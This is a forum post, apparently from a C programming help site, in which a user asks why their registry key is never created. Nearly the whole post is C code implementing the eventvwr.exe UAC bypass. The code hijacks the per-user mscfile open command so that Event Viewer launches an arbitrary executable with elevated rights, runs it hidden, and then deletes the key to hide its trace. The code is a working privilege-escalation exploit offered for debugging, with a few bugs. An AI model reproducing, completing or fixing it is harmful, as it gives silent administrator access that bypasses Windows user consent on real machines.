creating regedit rule fails c code

Hi i did one little program that create a regedit rule and run my program with eventvwr.exe. But the first problem i have the regedit rule never is created and i dont know why.
Code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

/*
 * Pretty standard code to recursively nuke a Reg Key
 */

int RegDelnodeRecurse (LPTSTR lpSubKey) {
    LPTSTR lpEnd;
    LONG lResult;
    DWORD dwSize = MAX_PATH;
    TCHAR szName[MAX_PATH];
    HKEY hKey;
    FILETIME ftWrite;

    lResult = RegDeleteKey(HKEY_CURRENT_USER, lpSubKey);

    if (lResult == ERROR_SUCCESS) return 1;

    lResult = RegOpenKeyEx(HKEY_CURRENT_USER, lpSubKey, 0, KEY_READ, &hKey);

    if (lResult != ERROR_SUCCESS) return lResult == ERROR_FILE_NOT_FOUND;

    lpEnd    = lpSubKey + lstrlen(lpSubKey);
    *lpEnd++ = '\\';
    *lpEnd   = '\0';

    if (RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite) == ERROR_SUCCESS) {
        do {
            strcpy(lpEnd, szName);
            if (!RegDelnodeRecurse(lpSubKey)) break;
            lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite);
        } while (lResult == ERROR_SUCCESS);
    }

    lpEnd--;
    *lpEnd = TEXT('\0');

    RegCloseKey(hKey);

    return RegDeleteKey(HKEY_CURRENT_USER, lpSubKey) == ERROR_SUCCESS;
}

/*
 * Wrapper for above
 */

int RegDelnode() {
    TCHAR szDelKey[MAX_PATH*2] = "Software\\Classes\\mscfile";
    return RegDelnodeRecurse(szDelKey);
}

void __c_UAC() {
    char curPath[MAX_PATH], evtVwr[MAX_PATH];
    HKEY attackKey;
    SHELLEXECUTEINFO exInfo;

    GetCurrentDirectory(MAX_PATH, curPath);
    strcat(curPath, "\\foobar.exe");


    sprintf(evtVwr, "%s\\System32\\eventvwr.exe", getenv("SYSTEMROOT"));

    if(!RegDelnode()) return;
    if(RegCreateKey(HKEY_CURRENT_USER, "Software\\Classes\\mscfile\\shell\\open\\command", &attackKey)!=ERROR_SUCCESS) return;

    RegSetValueEx(attackKey, "", 0, REG_SZ, curPath, strlen(curPath));

    exInfo.lpVerb       = "open";
    exInfo.lpFile       = evtVwr;
    exInfo.nShow        = 0;
    exInfo.fMask        = SEE_MASK_NOCLOSEPROCESS;
    exInfo.cbSize       = sizeof(SHELLEXECUTEINFO);
    exInfo.hwnd         = 0;
    exInfo.lpParameters = 0;
    exInfo.lpDirectory  = 0;
    exInfo.hInstApp     = 0;

    ShellExecuteEx(&exInfo);

    Sleep(5000);

    TerminateProcess(exInfo.hProcess, 0);

    RegCloseKey(attackKey);
    RegDelnode();
}

int main(int argc, char *argv[]) {
    __c_UAC();
    return 0;
}
Last edited on
Topic archived. No new replies allowed.